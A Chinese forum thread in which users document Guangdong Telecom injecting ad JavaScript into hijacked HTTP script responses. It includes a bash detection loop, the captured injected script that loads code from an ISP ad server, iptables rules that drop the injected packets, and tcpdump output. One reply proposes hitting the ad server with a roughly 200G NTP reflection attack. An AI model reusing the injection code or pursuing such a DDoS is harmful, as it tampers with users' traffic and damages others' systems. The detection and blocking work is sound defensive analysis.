已知广东电信宽带会随机弹出广告窗口(无图,见过的都知道),由于出现得比较随机,一直不太好复现,这几天有点时间研究了下,写了个脚本复现:
host='mat1.gtimg.com'
path='/www/asset/seajs/sea.js'
referer='http://www.qq.com/'
useragent='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'
while :
do
hostips=$(nslookup $host|grep -Po '(?<=Address: ).*$')
count=$(echo -e "$hostips"|wc -l)
randresolv=$(echo -e "$hostips"|tail -$((1+RANDOM%count))|head -1)
date=$(date)
content=$(curl -s -N --no-keepalive http://$randresolv$path -H "Host: $host" -H "User-Agent: $useragent" -H "Referer: $referer" -H 'Connection: keep-alive' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache')
if echo $content|grep -q 183.59; then
logtext=$(echo "ChinaTelecom javascript hijacking detected - $randresolv - $date")
printf "\n$logtext"
echo $logtext >> ./checklog
echo $content > ./capturedcontent
else
printf .
fi
sleep 10
done
电信只劫持 URL 以.js 结尾、有 Referer 头的 HTTP 请求,上网随便找个 js,以腾讯首页中的 SeaJS 为例,将相应信息填入脚本中的host
path
referer
变量,执行脚本,一段时间(可达一两个小时)后即可出现劫持,劫持频率大概是每 1 到 10 个请求随机出现一次劫持。
运行效果如下图所示: http://ww2.sinaimg.cn/large/0060lm7Tly1fptp6dvpy0j30h20933z0.jpg
劫持后替换的内容:
var _atn_obj_ = new Object;
_atn_obj_.oldurl = 'http://mat1.gtimg.com/www/asset/seajs/sea.js?cHVzaA=100745';
_atn_obj_.unified_url = 'http://183.59.53.197:3737/remind_adv/ad_unified_access?SP=ABzs...zoPP';
window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0);
window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.unified_url;document.getElementsByTagName("head")[0].appendChild(a);},0);
不知道这样算不算是实锤,如果算的话周末准备投诉到 10000,若不见效将写详细报告投诉到工信部
1
silencefent 2018-03-29 15:37:24 +08:00
没用哒
|
2
LGA1150 2018-03-29 15:54:11 +08:00 via Android
是 301/302 跳转吗?可以暂时在路由器上 iptables 过滤抢答包
iptables -I FORWARD -p tcp --sport 80 -m string --string "Location: http://183.59.53." --algo bm -j DROP (自行去掉自动被 V2 添加的分号) 还可以加个 TTL 匹配,减少负荷 |
3
Telegram 2018-03-29 15:55:46 +08:00 via iPhone
最多给你添加到白名单,不给你劫持,要让他停止这种行为,不可能的。
|
6
yexm0 2018-03-29 16:07:09 +08:00 via iPhone
|
8
winterbells 2018-03-29 16:11:27 +08:00
电信只劫持 URL 以.js 结尾 ———>
可能根据地区不同吧,空白页面也会有广告,就是那种一个字符都没有的网页 劫持还会识别是否是移动设备,有个 js 文件会判断 找客服直接说关闭劫持,她就懂了,不过没有承认劫持,只是反复强调机房那边会处理 |
9
mario85 OP |
10
mario85 OP @winterbells 什么都不做也可能出现广告,其实也就是浏览器或者其他后台进程开了 js,被劫持直接弹出来
|
12
learnshare 2018-03-29 16:19:03 +08:00
即便投诉他,也只会针对你家处理一下而已
毕竟隐私的钱很好赚 |
13
mario85 OP @learnshare 反正认识的人多得很,去别人家喝杯茶连个 WiFi 跑下脚本,还出现的话就不说问题解决
篡改用户流量貌似属于违法,现在是传广告,谁知道他们会不会悄咪咪的做别的事情 https://www.zhihu.com/question/20723856 |
14
hicdn 2018-03-29 16:27:19 +08:00
停止是不可能的,参见之前国务院 APP 被劫持。
|
16
learnshare 2018-03-29 17:11:53 +08:00
@mario85 别的事情肯定要做,钱当然是越多越好了
|
18
t895 2018-03-30 17:16:40 +08:00 via iPhone
刚刚好撸了个 ntp 反弹,大概 200G 左右,试试打下这个服务器
|
19
ShareDuck 2018-04-01 00:48:07 +08:00 via Android
关于广告这个问题,第一次是投诉到工信部才解决的,之后的都是 10000 号搞定了。
|
20
qwertyegg 2018-04-01 12:08:04 +08:00
这种情况,用 opendns 是不是能解决?
|
21
feng0vx 2018-04-01 12:33:22 +08:00 via Android
没用的,工信部现在都没用了,我投诉过广告的事情,他们回电话说合同上没有约束,他们管不了
|
22
wr410 2018-04-01 13:36:07 +08:00
很多年前写的博文,直接拉到最后,了解一下
https://blog.csdn.net/wr410/article/details/25594273 |
23
wolfie 2018-04-02 15:24:07 +08:00
给客服打电话可以关。
https 都劫持 有什么隐私可言呢 |
24
LGA1150 2018-05-24 01:05:40 +08:00
我似乎抓到劫持包了
似乎所有的劫持包都有一个变量"_atn_obj_" 于是用 iptables 关键字匹配: iptables -A forwarding_rule -i pppoe-wan -p tcp --sport 80 -m string --string "_atn_obj_" --algo bm -j LOG 同时后台开着 tcpdump 直到内核日志中出现一条: [54945.458949] IN=pppoe-wan OUT=ct MAC= SRC=119.23.80.130 DST=10.2.1.2 LEN=894 TOS=0x00 PREC=0x00 TTL=56 ID=9997 DF PROTO=TCP SPT=80 DPT=45021 WINDOW=256 RES=0x00 ACK PSH URGP=0 然后我过滤抓包结果: 00:35:20.051969 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [S], seq 296045250, win 64240, options [mss 1432,sackOK,TS val 3110253 ecr 0,nop,wscale 8], length 0 00:35:20.060124 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [S.], seq 4085280, ack 296045251, win 14600, options [mss 1444,nop,nop,sackOK,nop,wscale 7], length 0 00:35:20.071531 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1, win 251, length 0 00:35:20.073405 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [P.], seq 1:1530, ack 1, win 251, length 1529: HTTP: GET /static/image/mobile/styletouch.css HTTP/1.1 00:35:20.081913 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [.], ack 1433, win 137, length 0 00:35:20.082025 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [.], ack 1530, win 137, length 0 00:35:20.094693 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 1:245, ack 1530, win 137, length 244: HTTP: HTTP/1.1 304 Not Modified 00:35:20.106128 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 245, win 256, length 0 00:35:20.110373 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], seq 1530:2962, ack 245, win 256, length 1432: HTTP: GET /static/assets/js/amazeui.min.js HTTP/1.1 00:35:20.110765 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [P.], seq 2962:3040, ack 245, win 256, length 78: HTTP 00:35:20.129094 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:1099, ack 2962, win 256, length 854: HTTP: HTTP/1.1 200 OK 00:35:20.129715 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [.], ack 3040, win 159, length 0 00:35:20.143467 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified 00:35:20.150041 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0 00:35:20.154660 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0 00:35:20.361116 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0 00:35:20.361483 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified 00:35:20.394913 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0 00:35:20.582203 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0 00:35:20.799507 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified 00:35:20.817570 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0 00:35:21.021165 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0 00:35:21.675574 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified 00:35:21.715799 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0 00:35:21.904377 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0 00:35:23.427507 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified 00:35:23.454270 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0 00:35:26.931735 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified 00:35:27.118104 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [R], seq 296048290, win 0, length 0 可以看到 00:35:20.129094 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:1099, ack 2962, win 256, length 854: HTTP: HTTP/1.1 200 OK 这个就是返回的 200 劫持,而真正的服务器返回的是 00:35:20.143467 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified 根据关键字、TCP FLAGS 和 TTL 匹配包并 DROP 掉 iptables -A forwarding_rule -i pppoe-wan -p tcp --sport 80 -m ttl --ttl-eq 55 --tcp-flags ALL PSH,ACK -m string --string "_atn_obj_" --algo bm -j DROP 存放广告内容的服务器 IP 有 183.59.53.187 183.59.53.188 183.59.53.224 ,po 主的是 183.59.53.197 ,看来可以放心地把整段 IP 屏蔽了 |